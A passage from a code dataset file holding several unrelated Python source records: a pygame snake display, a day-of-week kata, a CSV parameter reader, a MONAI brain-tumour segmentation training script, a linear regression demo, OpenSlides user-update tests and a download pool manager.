node_potential[i][0] * msg[0]\n marginals[i][1] = node_potential[i][1] * msg[1]\n\n # normalize marginals\n normalize_marginals(marginals)\n\n yield marginals\n","sub_path":"ps5/bp.py","file_name":"bp.py","file_ext":"py","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"245875285","text":"import pygame\n\nfrom src.frontend.text import Text\nimport constants as c\n\nclass Display():\n\n def __init__(self):\n pygame.init()\n self._screen = pygame.display.set_mode(((c.TILE_X+2)*c.TILE_SIZE,(c.TILE_Y+2)*c.TILE_SIZE))\n self._run = True\n self._EndGame = False\n self.PrepareWinTexts()\n self._winner = 0\n\n def PrepareWinTexts(self):\n screen_width = ((c.TILE_X+1)*c.TILE_SIZE)//2\n screen_height = ((c.TILE_Y+1)*c.TILE_SIZE)//2\n self._win_1 = Text(self._screen,screen_width,screen_height,\"Player 1 wins\")\n self._win_2 = Text(self._screen,screen_width,screen_height,\"Player 2 wins\")\n self._win_3 = Text(self._screen,screen_width,screen_height,\"Tie!\")\n\n def Update(self,objects):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self._run = False\n \n self.FillBackground()\n self.FillBorder()\n self.FillObjects(objects)\n self.VictoryText(self._winner)\n\n pygame.display.update()\n \n def VictoryText(self,winner):\n if winner == 1:\n self._win_1.Draw()\n elif winner == 2:\n self._win_2.Draw()\n elif winner == 3:\n self._win_3.Draw()\n \n def FillBackground(self):\n self._screen.fill(c.WHITE)\n\n def FillBorder(self):\n for i 
in range(c.TILE_X+2):\n for j in range(c.TILE_Y+2):\n if i == 0 or j == 0 or i == c.TILE_X+1 or j == c.TILE_Y+1:\n self.FillTile(i,j,c.BLACK)\n \n def FillTile(self,x,y,colour):\n pygame.draw.rect(self._screen,colour,(x*c.TILE_SIZE,y*c.TILE_SIZE,c.TILE_SIZE,c.TILE_SIZE))\n\n def FillObjects(self,objects):\n player_1 = objects[0].GetBody()\n player_2 = objects[1].GetBody()\n fruit = objects[2]\n\n for body in fruit:\n self.FillTile(body[0]+1,body[1]+1,c.BLUE)\n for body in player_1:\n self.FillTile(body[0]+1,body[1]+1,c.RED)\n for body in player_2:\n self.FillTile(body[0]+1,body[1]+1,c.GREEN)\n \n player_1_tag = Text(self._screen,(player_1[0][0]+1.5)*c.TILE_SIZE,(player_1[0][1]+1.55)*c.TILE_SIZE,\"1\")\n player_2_tag = Text(self._screen,(player_2[0][0]+1.5)*c.TILE_SIZE,(player_2[0][1]+1.55)*c.TILE_SIZE,\"2\")\n player_1_tag.Draw()\n player_2_tag.Draw()\n\n def Winner(self,winner):\n if winner:\n self._EndGame = True\n self._winner = winner\n\n def IsGameRun(self):\n return self._run","sub_path":"Snakes 2/src/frontend/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"588500024","text":"\"\"\"\nWrite a function which takes a string (day of week) and an integer (number to \nbe tested) and tests whether number matches rules below (return a boolean).\n\nMonday --> 12\nTuesday --> numbers greater than 95\nWednesday --> 34\nThursday --> 0\nFriday --> numbers divisible by 2\nSaturday --> 56\nSunday --> 666 or -666\n\n\"\"\"\n\ndef am_I_afraid(day,num):\n\n\n\t\"\"\"\n\t>>> am_I_afraid(\"Monday\", 13)\n\tFalse\n\t>>> am_I_afraid(\"Sunday\", -666)\n\tTrue\n\t>>> am_I_afraid(\"Tuesday\", 2)\n\tFalse\n\t>>> am_I_afraid(\"Tuesday\", 965)\n\tTrue\n\t>>> am_I_afraid(\"Friday\", 2)\n\tTrue\n\t\"\"\"\n\n\t\"\"\" \n\tthe dictionary approach, clarified after seeing solutions.\n\tdidn't know I could use dict like this, with rules \n\tbeing tested at return statement. 
very cool.\n\t\"\"\"\n\treturn {\n\t\"Monday\": num == 12,\n\t\"Tuesday\": num > 95,\n\t\"Wednesday\": num == 34,\n\t\"Thursday\": num == 0,\n\t\"Friday\": num % 2 == 0,\n\t\"Saturday\": num == 56,\n\t\"Sunday\": abs(num) == 666\n\t}[day]\n\n\nif __name__ == \"__main__\":\n\n\timport doctest\n\tdoctest.testmod()","sub_path":"cw/cw_7_selectiveFearOfNum.py","file_name":"cw_7_selectiveFearOfNum.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"250045332","text":"''' Written 4/12/2018 by Ross Hartley\n This program checks the log .csv file and returns the parameters for AC, AQ, and mcl_cluster\n'''\n\n# Helper function to turn csv values into numbers\ndef strClean(input):\n output = input\n i = 0\n # Iterate through each item in input and cast it as a float, removing brackets and such\n for str in input:\n output[i] = float(str[1:(len(str)-1)])\n i = i + 1\n return output\n\ndef get_params(csv_filepath):\n import csv\n import os\n\n # Store path to log file\n log_path = os.path.join(csv_filepath, \"hs_log.csv\")\n # Make variables for parameters\n ac_params = []\n aq_params = []\n cl_params = []\n with open(log_path, 'r') as hs_log:\n # Get data from log file\n reader = csv.reader(hs_log)\n data = list(reader)\n row_count = len(data)\n lastrow = row_count - 1\n # Store AC data in ac_params\n ac_params = data[lastrow][0:2]\n # ac_params = strClean(ac_params)\n # Store AQ data in aq_params\n aq_params = data[lastrow][2:7]\n # aq_params = strClean(aq_params)\n # Store Clustering data in cl_params\n cl_params = data[lastrow][7:11]\n # cl_params = strClean(cl_params)\n # Store status of AC, AQ, and CL\n ac_stat = data[lastrow][14:15]\n aq_stat = data[lastrow][15:16]\n cl_stat = data[lastrow][16:17]\n\n return ac_params, aq_params, cl_params, ac_stat, aq_stat, cl_stat\n","sub_path":"hotspotter/get_params.py","file_name":"get_params.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"642749488","text":"################################################################\n# bit to help with torch/monai bug reported at # \n# https://github.com/Project-MONAI/MONAI/issues/701 #\nimport resource #\nrlimit = resource.getrlimit(resource.RLIMIT_NOFILE) #\nresource.setrlimit(resource.RLIMIT_NOFILE, (4096, rlimit[1])) #\n################################################################\n\nimport os\nimport shutil\nimport json\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom monai.config import print_config\nfrom monai.data import DataLoader, CacheDataset, partition_dataset\nfrom monai.losses import DiceLoss\nfrom monai.metrics import DiceMetric\nfrom monai.networks.nets import UNet\nfrom monai.transforms import (\n Activations,\n AddChanneld,\n AsDiscrete,\n CenterSpatialCropd,\n Compose,\n LoadImaged,\n MapTransform,\n NormalizeIntensityd,\n Orientationd,\n RandFlipd,\n RandScaleIntensityd,\n RandShiftIntensityd,\n RandSpatialCropd,\n Spacingd,\n ToTensord,\n)\nfrom monai.utils import set_determinism\n\nimport torch\nfrom torch.utils.data import ConcatDataset\nimport torch.nn as nn\n\n\nimport matplotlib.pyplot as plt\n\nfrom math import floor\n\nfrom typing import Union, List, Tuple\n\n#################################################################\n\n# Local imports\n\nSOURCE_CODE_PATH = '/homes/yc7620/Documents/medical-vision-textural-bias/source_code/'\n\nimport 
sys\nsys.path.append(SOURCE_CODE_PATH)\n\nfrom filters_and_operators import WholeTumorTCGA \nfrom utils import ReCompose\nfrom stylization_layers import GibbsNoiseLayer\n# set determinism for reproducibility\nset_determinism(seed=0)\n\nprint_config()\n\nroot_dir = '/vol/bitbucket/yc7620/90_data/53_TCGA_data/' \nprint('root_dir', root_dir)\n#################################################################\n# blurb\n\nprint('stylized network on four modalities. excluding one institution\\n')\n\n#################################################################\n# SCRIPT PARAMETERS \n\n\n# gibbs layer starting point\nalpha = 0.7\n\nJOB_NAME = f\"gibbs{alpha}_layer_GibbsGD_model_sourceDist_4mods_WT\"\nprint(f\"JOB_NAME = {JOB_NAME}\\n\")\n\n# create dir\n\nworking_dir = os.path.join(root_dir,JOB_NAME)\ntry:\n os.mkdir(working_dir)\nexcept:\n print('creating version _2 of working dir') \n JOB_NAME = JOB_NAME + '_2'\n working_dir = os.path.join(root_dir,JOB_NAME)\n os.mkdir(working_dir)\n#############################################################################\n\n\n# Preprocessing transforms. Note we use wrapping artifacts. \n\ntrain_transform = ReCompose(\n [\n LoadImaged(keys=[\"image\", \"label\"]),\n AddChanneld(keys=\"image\"),\n WholeTumorTCGA(keys=\"label\"),\n Spacingd(\n keys=[\"image\", \"label\"],\n pixdim=(1.5, 1.5, 2.0),\n mode=(\"bilinear\", \"nearest\")\n ),\n Orientationd(keys=[\"image\", \"label\"], axcodes=\"RAS\"),\n RandSpatialCropd(\n keys=[\"image\", \"label\"], roi_size=[128, 128, 64], random_size=False\n ),\n RandFlipd(keys=[\"image\", \"label\"], prob=0.5, spatial_axis=0),\n NormalizeIntensityd(keys=\"image\", nonzero=True, channel_wise=True),\n RandScaleIntensityd(\"image\", factors=0.1, prob=0.5),\n RandShiftIntensityd(\"image\", offsets=0.1, prob=0.5),\n ToTensord(keys=[\"image\", \"label\"]),\n ]\n)\n\nval_transform = ReCompose(\n [\n LoadImaged(keys=[\"image\", \"label\"]),\n AddChanneld(keys=\"image\"),\n WholeTumorTCGA(keys=\"label\"),\n Spacingd(\n keys=[\"image\", \"label\"],\n pixdim=(1.5, 1.5, 2.0),\n mode=(\"bilinear\", \"nearest\"),\n ),\n Orientationd(keys=[\"image\", \"label\"], axcodes=\"RAS\"),\n CenterSpatialCropd(keys=[\"image\", \"label\"], roi_size=[128, 128, 64]),\n NormalizeIntensityd(keys=\"image\", nonzero=True, channel_wise=True),\n ToTensord(keys=[\"image\", \"label\"]),\n ]\n)\n\n\nprint('\\n')\nprint('training transforms: ', train_transform.transforms,'\\n')\nprint('validation transforms: ', val_transform.transforms, '\\n')\n###########################################################################\n\n# Dataloading\n\n# load data dictionaries\nwith open(os.path.join(root_dir, 'train_sequence_by_modality.json'), 'r') as f:\n data_seqs_4mods = json.load(f)\n\n# split off training and validation \ntrain_seq_flair, val_seq_flair = partition_dataset(data_seqs_4mods[\"FLAIR\"], [0.9, 0.1], shuffle=True, seed=0)\ntrain_seq_t1, val_seq_t1 = partition_dataset(data_seqs_4mods[\"T1\"], [0.9, 0.1], shuffle=True, seed=0)\ntrain_seq_t1gd, val_seq_t1gd = partition_dataset(data_seqs_4mods[\"T1Gd\"], [0.9, 0.1], shuffle=True, seed=0)\ntrain_seq_t2, val_seq_t2 = partition_dataset(data_seqs_4mods[\"T2\"], [0.9, 0.1], shuffle=True, seed=0)\n# create datasets\n\ntrain_ds_flair = CacheDataset(train_seq_flair, train_transform, cache_num=100)\ntrain_ds_t1 = CacheDataset(train_seq_t1, train_transform, cache_num=100)\ntrain_ds_t1gd = CacheDataset(train_seq_t1gd, train_transform, cache_num=100)\ntrain_ds_t2 = CacheDataset(train_seq_t2, train_transform, 
cache_num=100)\n\nval_ds_flair = CacheDataset(val_seq_flair, val_transform, cache_num=50)\nval_ds_t1 = CacheDataset(val_seq_t1, val_transform, cache_num=50)\nval_ds_t1gd = CacheDataset(val_seq_t1gd, val_transform, cache_num=50)\nval_ds_t2 = CacheDataset(val_seq_t2, val_transform, cache_num=50)\n\nval_ds = ConcatDataset([val_ds_flair, val_ds_t1, val_ds_t1gd, val_ds_t2])\ntrain_ds = ConcatDataset([train_ds_flair, train_ds_t1, train_ds_t1gd, train_ds_t2])\n\n# dataloaders\ntrain_loader = DataLoader(train_ds, batch_size=2, shuffle=True, num_workers=4)\nval_loader = DataLoader(val_ds, batch_size=2, shuffle=False, num_workers=4)\n\nprint('Data loaders created.\\n')\n############################################################################\n\n# Create model, loss, optimizer\n\nclass Gibbs_UNet(nn.Module):\n \"\"\"ResUnet with Gibbs layer\"\"\"\n \n def __init__(self, alpha=None):\n super().__init__()\n \n self.gibbs = GibbsNoiseLayer(alpha)\n \n self.ResUnet = UNet(\n dimensions=3,\n in_channels=1,\n out_channels=1,\n channels=(16, 32, 64, 128, 256),\n strides=(2, 2, 2, 2),\n num_res_units=2,\n )\n \n def forward(self,img):\n img = self.gibbs(img) \n img = self.ResUnet(img)\n return img\n \ndevice = torch.device(\"cuda:0\")\n\nmodel = Gibbs_UNet(alpha).to(device)\n\n# load trained baseline ResUnet\n# baseline_path = '/vol/bitbucket/yc7620/90_data/52_MONAI_DATA_DIRECTORY/10_training_results/imperial_project_data/baseline_model_sourceDist_4mods_WT/baseline_model_sourceDist_4mods_WT.pth'\n\n# model.ResUnet.load_state_dict(torch.load(baseline_path))\n\nloss_function = DiceLoss(to_onehot_y=False, sigmoid=True, squared_pred=True)\n\noptimizer = torch.optim.Adam(\n model.parameters(), 1e-4, weight_decay=1e-5, amsgrad=True)\n\n\n###########################################################################\n\n# freeze Unet\n# for param in model.ResUnet.parameters():\n# param.requires_grad = False\n \nprint('Model instantiated with number of parameters = ',\n sum([p.numel() for p in model.parameters() if p.requires_grad]))\n\n############################################################################\n\n# Training loop\n\nmax_epochs = 110\nval_interval = 2\nbest_metric = -1\nbest_metric_epoch = -1\nepoch_loss_values = []\nmetric_values = []\ngibbs_values = [] # store the Gibbs trajectory\n\nprint('\\n Training started... 
\\n')\n\n@torch.no_grad()\ndef Gibbs_GD(inputs, labels, model, h = 0.01, learning_rate = 0.02):\n \"\"\"Function to update Gibbs layer via finite different SG\"\"\"\n# with torch.no_grad():\n old_alpha = model.gibbs.alpha.clone()\n # loss at alpha\n outputs_0 = model(inputs)\n loss_0 = loss_function(outputs_0, labels)\n # loss at perturbed alpha\n model.gibbs.alpha = old_alpha + h\n outputs_h = model(inputs)\n loss_h = loss_function(outputs_h, labels)\n # approximate gradient\n delta = (loss_h - loss_0) / h\n # update alpha and model\n model.gibbs.alpha = old_alpha - learning_rate * delta\n \n return loss_0.detach().item(), model.gibbs.alpha.item()\n \n\nfor epoch in range(max_epochs):\n print(\"-\" * 10)\n print(f\"epoch {epoch + 1}/{max_epochs}\")\n model.train()\n epoch_loss = 0\n gibbs_loss_epoch = 0\n step = 0\n for batch_data in train_loader:\n #save gibbs trajectory\n gibbs_values.append(model.gibbs.alpha.detach().item())\n \n step += 1\n inputs, labels = (\n batch_data[\"image\"].to(device),\n batch_data[\"label\"].to(device),\n )\n # update the Unet\n optimizer.zero_grad()\n outputs = model(inputs)\n loss = loss_function(outputs, labels)\n loss.backward()\n optimizer.step()\n epoch_loss += loss.item()\n \n # update Gibbs\n gibbs_loss, gibbs_alpha = Gibbs_GD(inputs, labels, model)\n gibbs_values.append(gibbs_alpha)\n # gibbs_loss_epoch += gibbs_loss\n \n\n epoch_loss /= step\n # gibbs_loss_epoch /= step\n epoch_loss_values.append(epoch_loss)\n # epoch_loss_values.append(gibbs_loss_epoch) # TODO: use this line with frozen Unet only\n print(f\"epoch {epoch + 1} average loss: {epoch_loss:.4f}\")\n \n # test on validation\n if (epoch + 1) % val_interval == 0:\n model.eval()\n with torch.no_grad():\n dice_metric = DiceMetric(include_background=True, reduction=\"mean\")\n post_trans = Compose(\n [Activations(sigmoid=True), AsDiscrete(threshold_values=True)]\n )\n metric_sum = 0.0\n metric_count = 0\n for val_data in val_loader:\n val_inputs, val_labels = (\n val_data[\"image\"].to(device),\n val_data[\"label\"].to(device),\n )\n val_outputs = model(val_inputs)\n val_outputs = post_trans(val_outputs)\n # compute overall mean dice\n value, not_nans = dice_metric(y_pred=val_outputs, y=val_labels)\n not_nans = not_nans.item()\n metric_count += not_nans\n metric_sum += value.item() * not_nans\n\n metric = metric_sum / metric_count\n metric_values.append(metric)\n\n if metric > best_metric:\n best_metric = metric\n best_metric_epoch = epoch + 1\n torch.save(\n model.state_dict(),\n os.path.join(working_dir, JOB_NAME + '.pth'),\n )\n print(\"saved new best metric model\")\n print(\n f\"current epoch: {epoch + 1} current mean dice: {metric:.4f}\"\n f\"\\nbest mean dice: {best_metric:.4f}\"\n f\" at epoch: {best_metric_epoch}\"\n )\n\n# print best metric and epoch\nprint(\n f\"train completed, best_metric: {best_metric:.4f}\"\n f\" at epoch: {best_metric_epoch}\"\n)\n\n############################################################################\n\n# Save learning curves\n\nprint('Plotting learning curves')\n\nplt.figure(\"train\", (12, 6))\nplt.subplot(1, 2, 1)\nplt.title(\"Epoch average Loss\")\nx = [i + 1 for i in range(len(epoch_loss_values))]\ny = epoch_loss_values\nplt.xlabel(\"epoch\")\nplt.plot(x, y, color=\"red\")\nplt.subplot(1, 2, 2)\nplt.title(\"Val mean Dice\")\nx = [val_interval * (i + 1) for i in range(len(metric_values))]\ny = metric_values\nplt.xlabel(\"epoch\")\nplt.plot(x, y, color=\"green\")\nplt.savefig(os.path.join(root_dir, 
f'trainLoss_and_meanValScore_{JOB_NAME}.png'))\nplt.show()\n\n\n\n###########################################################################\n\n# save training information\n\nprint('Saving epoch_loss_values and metrics')\n\nnp.savetxt(os.path.join(working_dir, f'epoch_loss_values_{JOB_NAME}.txt'), np.array(epoch_loss_values))\nnp.savetxt(os.path.join(working_dir, f'metric_values_{JOB_NAME}.txt'), np.array(metric_values))\nnp.savetxt(os.path.join(working_dir, f'gibbs_trajectory_{JOB_NAME}.txt'), np.array(gibbs_values))\n############################################################################\n\nprint('script ran fully')\n","sub_path":"10_scripts/300_instutional_distribution/350_stylized_layers/gibbs0p7_layer_domain_GD_inDist.py","file_name":"gibbs0p7_layer_domain_GD_inDist.py","file_ext":"py","file_size_in_byte":12227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"80598964","text":"# -*- coding:utf-8 -*-\n# Author: JunFengG\n# Created: 2018/9/29 0029 11:14 \n# File: regression\n\nimport numpy as np\nfrom sklearn import linear_model\nimport sklearn.metrics as sm\nimport matplotlib.pyplot as plt\n\nfilename='data_singlevar.txt'\nx=[]\ny=[]\nwith open(filename,'r') as f:\n for line in f.readlines():\n xt,yt=[float(i) for i in line.split(',')]\n x.append(xt)\n y.append(yt)\n\nnum_training=int(0.8*len(x))\nnum_test=len(x)-num_training\n\n# training data\nx_train=np.array(x[:num_training]).reshape((num_training,1))\ny_train=np.array(y[:num_training])\n\n# test data\nx_test=np.array(x[num_training:]).reshape((num_test,1))\ny_test=np.array(y[num_training:])\n\n# build the linear regression object\nliner_regressor=linear_model.LinearRegression()\n\n# fit the model on the training set\nliner_regressor.fit(x_train,y_train)\n\n# training set\ny_train_pred=liner_regressor.predict(x_train)\nplt.figure()\nplt.scatter(x_train, y_train, color='green')\nplt.plot(x_train, y_train_pred, linewidth='4', color='coral')\nplt.show()\n\n# test set\ny_test_pred=liner_regressor.predict(x_test)\nplt.scatter(x_test, y_test, color='green')\nplt.plot(x_test, y_test_pred, linewidth='4', color='coral')\nplt.show()\n\n\nprint('mse=',round(sm.mean_squared_error(y_test,y_test_pred),2))\nprint('mae=',round(sm.mean_absolute_error(y_test,y_test_pred),2))\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"PythonMechineLearningCookbook/Chapter01/regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"613137776","text":"from tests.system.action.base import BaseActionTestCase\n\n\nclass UserUpdateSelfActionTest(BaseActionTestCase):\n def test_update_correct(self) -> None:\n self.update_model(\n \"user/1\",\n {\"username\": \"username_srtgb123\"},\n )\n response = self.request(\n \"user.update_self\",\n {\n \"username\": \"username_Xcdfgee\",\n \"email\": \"email1@example.com\",\n },\n )\n self.assert_status_code(response, 200)\n model = self.get_model(\"user/1\")\n assert model.get(\"username\") == \"username_Xcdfgee\"\n assert model.get(\"email\") == \"email1@example.com\"\n\n def test_username_already_given(self) -> None:\n self.create_model(\"user/222\", {\"username\": \"user\"})\n response = self.request(\"user.update_self\", {\"username\": \"user\"})\n self.assert_status_code(response, 400)\n assert (\n response.json[\"message\"] == \"A user with the username user already exists.\"\n )\n\n def test_update_self_anonymus(self) -> None:\n response = self.request(\n \"user.update_self\",\n {\"email\": \"user@openslides.org\"},\n anonymous=True,\n 
)\n self.assert_status_code(response, 403)\n self.assertIn(\n \"Anonymous is not allowed to execute user.update_self\",\n response.json[\"message\"],\n )\n\n def test_update_self_about_me(self) -> None:\n self.create_meeting()\n self.user_id = self.create_user(\"test\", group_ids=[1])\n self.login(self.user_id)\n self.update_model(\"user/2\", {\"meeting_ids\": [1]})\n response = self.request(\n \"user.update_self\",\n {\n \"about_me_$\": {\n \"1\": \"This is for meeting/1\",\n }\n },\n )\n self.assert_status_code(response, 200)\n self.assert_model_exists(\"user/2\", {\"about_me_$1\": \"This is for meeting/1\"})\n\n def test_update_self_about_me_wrong_meeting(self) -> None:\n self.create_meeting()\n self.user_id = self.create_user(\"test\", group_ids=[1])\n self.login(self.user_id)\n self.set_models(\n {\n \"user/2\": {\"meeting_ids\": [1]},\n \"meeting/2\": {\"is_active_in_organization_id\": 1},\n }\n )\n response = self.request(\n \"user.update_self\",\n {\n \"about_me_$\": {\n \"1\": \"This is for meeting/1\",\n \"2\": \"This is for meeting/2\",\n }\n },\n )\n self.assert_status_code(response, 400)\n self.assertIn(\n \"User may update about_me_$ only in his meetings, but tries in [2]\",\n response.json[\"message\"],\n )\n\n def test_update_self_forbidden_username(self) -> None:\n self.update_model(\n \"user/1\",\n {\"username\": \"username_srtgb123\"},\n )\n response = self.request(\n \"user.update_self\",\n {\n \"username\": \" \",\n },\n )\n self.assert_status_code(response, 400)\n model = self.get_model(\"user/1\")\n assert model.get(\"username\") == \"username_srtgb123\"\n assert \"This username is forbidden.\" in response.json[\"message\"]\n","sub_path":"tests/system/action/user/test_update_self.py","file_name":"test_update_self.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"194191987","text":"# -*- coding: UTF-8 -*-\nfrom .struct.task import TaskManager, TasksManagerForWorkers\nfrom .struct.queue import TaskQueue\nfrom ..utils.eventdriven import ControllerPool, Controller, Subprocess, EventPending, Timer\nfrom ._manager import (EVT_MANAGER_WORKER_SPEED_LIMIT, EVT_MANAGER_WORKER_PAUSE)\nfrom nbdler.event import EVT_MANAGER_START\nfrom ._manager import manager_model, workers_model\nfrom ..utils.misc import Component\nfrom ..error import ManagerError\nfrom threading import Lock\nfrom queue import Queue\n\n\nclass ManagerConfigure(Component):\n \"\"\" Configuration of the download pool manager.\"\"\"\n HEARTBEAT_INTERVAL = 0.5\n\n def __init__(self, maxsize, daemon=True, subprocess=False, max_speed=None, max_buff=None,\n heartbeat_interval=HEARTBEAT_INTERVAL):\n \"\"\"\n :param\n maxsize: maximum number of concurrent download tasks.\n daemon: daemon flag passed to the threads.\n subprocess: whether to run in subprocess mode.\n max_speed: maximum speed limit.\n max_buff: maximum memory buffer size. If None, each download task handles buffering on its own.\n heartbeat_interval: heartbeat refresh interval.\n \"\"\"\n self.maxsize = maxsize\n self.daemon = daemon\n self.subprocess = subprocess\n self.max_speed = max_speed\n self.max_buff = max_buff\n self.heartbeat_interval = heartbeat_interval\n\n def __snapshot__(self):\n return {\n 'maxsize': self.maxsize,\n 'daemon': self.daemon,\n 'subprocess': self.subprocess,\n 'max_speed': self.max_speed,\n 'max_buff': self.max_buff,\n 'heartbeat_interval': self.heartbeat_interval\n }\n\n\nclass Manager(Component):\n def __init__(self, maxsize, **configure):\n assert maxsize > 0\n self._subprocess = None\n # configuration of the download pool manager\n self.configure = ManagerConfigure(maxsize, **configure)\n # task ID queue\n self.__queue = TaskQueue()\n # queue of task IDs currently running\n self.working = []\n # task manager that aggregates accessors for download-object info\n task_mgr_for_workers = TasksManagerForWorkers()\n # initialize the console controller and the worker controllers.\n con_worker = Controller(mapping=manager_model, static={\n 'mgr': self, 'cfg': self.configure, 'queue': self.__queue, 'working': self.working\n }, daemon=self.configure.daemon, name='manager-%s' % maxsize)\n # the timer adapter handles the semaphore bookkeeping needed for speed limiting.\n con_worker.Adapter(Timer())\n workers_static = {\n '_is_subprocess': self.configure.subprocess, 'task_mgr': task_mgr_for_workers,\n }\n if self.configure.subprocess:\n # create one extra worker thread so that a spare idle worker is always available.\n con_worker.Adapter(Subprocess(maxsize=maxsize+1, mapping=workers_model, static=workers_static))\n # In subprocess mode the Subprocess plugin gives the console a controller pool inside the child process,\n # so the console controller also acts as a worker controller.\n workers = con_worker\n self._subprocess = con_worker.adapters['subprocess']\n # replace the parent process's download tasks with virtual instances.\n task_mgr_for_workers = self._subprocess['task_mgr']\n else:\n # add the EventPending adapter to unify the call behavior with subprocess mode\n con_worker.Adapter(EventPending())\n # In non-subprocess mode the worker controllers and the console controller are separate, so the console controller is put into the static context for easy access from the workers.\n workers_static['con_worker'] = con_worker\n workers = ControllerPool(maxsize, workers_model, static=workers_static, daemon=self.configure.daemon)\n\n self.workers = workers\n # expose the worker controllers to the console.\n con_worker.__static__['workers'] = self.workers\n self.con_worker = con_worker\n task_mgr_for_workers = TaskManager(task_mgr_for_workers, self.configure.subprocess, self.__queue)\n self._task_mgr = task_mgr_for_workers\n\n # exception queue\n self.__raise = Queue()\n self.__trap_lock = Lock()\n self.__paused = False\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n\n @property\n def body(self):\n \"\"\" Return the body info of the tasks in the running queue.\"\"\"\n return self._task_mgr.running_tasks.body\n\n info = body\n\n def __getitem__(self, item):\n if item == -1:\n return self._task_mgr.running_tasks\n elif item == -2:\n return self._task_mgr.all_tasks\n if item is not None and type(item) not in (tuple, list):\n # wrap in a tuple for uniform handling below.\n item = (item,)\n return self._task_mgr.get_tasks(item)\n\n @property\n def queue(self):\n \"\"\" Return the download task queue.\"\"\"\n return self.__queue\n\n def is_paused(self):\n \"\"\" Return whether the manager is paused.\"\"\"\n return self.__paused\n\n def is_alive(self):\n \"\"\" Return whether the manager is running.\"\"\"\n return self.con_worker.is_alive()\n\n def putrequest(self, request, enqueue=True):\n \"\"\" Add a download request to the pending queue.\n Returns the task ID used for subsequent operations on the task.\n \"\"\"\n tid = self.__queue.push(request)\n if enqueue:\n self.__queue.enqueue(tid)\n return tid\n\n def is_finished(self):\n \"\"\" Return whether all download tasks have finished.\"\"\"\n return not self.__paused and self.__queue.is_closed()\n\n def remaining_time(self):\n \"\"\" Return the total estimated remaining download time of the running tasks.\"\"\"\n return self._task_mgr.running_tasks.remaining_time()\n\n def remaining_length(self):\n \"\"\" Return the total number of bytes left to download for the running tasks.\"\"\"\n return self._task_mgr.running_tasks.remaining_length()\n\n def realtime_speed(self):\n \"\"\" Return the total real-time download speed of the running tasks.\"\"\"\n return self._task_mgr.running_tasks.realtime_speed()\n\n def average_speed(self):\n \"\"\" Return the total average download speed of the running tasks.\"\"\"\n return self._task_mgr.running_tasks.average_speed()\n\n def increment_go(self):\n \"\"\" Return the total number of bytes downloaded by the running tasks.\"\"\"\n return self._task_mgr.running_tasks.increment_go()\n\n def increment_done(self):\n \"\"\" Return the total number of bytes written to file by the running tasks.\"\"\"\n return self._task_mgr.running_tasks.increment_done()\n\n def wait(self, timeout=None):\n \"\"\" Wait until the enqueued tasks are processed and the download pool manager's controllers are idle.\"\"\"\n # wait until the whole queue has been processed\n self.__queue.join(timeout)\n # then wait until controller events are handled and the controllers are idle.\n self.con_worker.pending()\n self.con_worker.wait_for_idle()\n self.workers.pending()\n self.workers.wait_for_idle()\n\n join = wait\n\n def _raise_exception(self, error):\n \"\"\" Push an exception.\"\"\"\n if error is None:\n # only push None (the release signal) if trap() has actually acquired the lock.\n if not self.__trap_lock.locked():\n return\n self.__raise.put(error)\n\n def trap(self, timeout=None):\n \"\"\" Wait for and catch download exceptions. Note that only one thread should call this, otherwise the other threads will block.\"\"\"\n with self.__trap_lock:\n if not self.con_worker.is_alive():\n return\n while True:\n data = self.__raise.get(timeout=timeout)\n # a None payload is the message emitted when the console stops.\n if data is None:\n break\n tid, exception = data\n\n raise ManagerError(exception, tid)\n\n def start(self):\n \"\"\" Start/resume the download pool manager; tasks are then downloaded from the pending queue in order, up to the maximum number of concurrent tasks. \"\"\"\n if self.con_worker.is_alive():\n self.__paused = False\n # resume the suspended queue.\n self.__queue.start()\n # the manager is already running, so just try to run the queued tasks.\n self.con_worker.dispatch(EVT_MANAGER_START)\n self.con_worker.adapters['timer'].resume()\n else:\n # prepare the task queue\n self.__queue.start()\n # start the console thread.\n self.con_worker.run()\n # in subprocess mode the worker threads are controlled by the console, so they need not be started manually.\n if not self._subprocess:\n self.workers.run()\n self._task_mgr.start()\n # wait until the worker controllers' data is ready.\n self.con_worker.dispatch(EVT_MANAGER_START).pending()\n self.con_worker.adapters['timer'].set_timing(self.configure.heartbeat_interval)\n\n def pause(self, block=True):\n \"\"\" Pause the download pool manager.\"\"\"\n self.__paused = True\n self.workers.dispatch(EVT_MANAGER_WORKER_PAUSE, self.__queue.running)\n if block:\n self.join()\n\n def close(self):\n \"\"\" Close the download pool manager.\"\"\"\n assert self.is_alive()\n # Close the queue and the task manager before the console and worker threads,\n # to avoid errors from querying the subprocess for download info after shutdown.\n self.__queue.close()\n # close the task manager\n self._task_mgr.close()\n # shut down the console thread\n self.con_worker.shutdown()\n if not self._subprocess:\n self.workers.shutdown()\n self.con_worker.wait()\n self.workers.wait()\n # Clean up leftover unprocessed events of the console and the workers so a restart does not see stale events.\n self.con_worker.clean()\n self.workers.clean()\n\n def set_limit(self, max_speed):\n \"\"\" Set the manager's global download speed limit.\"\"\"\n self.configure.max_speed = max_speed\n if max_speed is None:\n # a max_speed of None disables the speed limit.\n self.workers.dispatch(EVT_MANAGER_WORKER_SPEED_LIMIT, False, context={'running': self.__queue.running})\n else:\n self.workers.dispatch(EVT_MANAGER_WORKER_SPEED_LIMIT, True, context={'running': self.__queue.running})\n\n def __snapshot__(self):\n return {\n 'configure': self.configure.__snapshot__(),\n 'queue': self.__queue.__snapshot__()\n 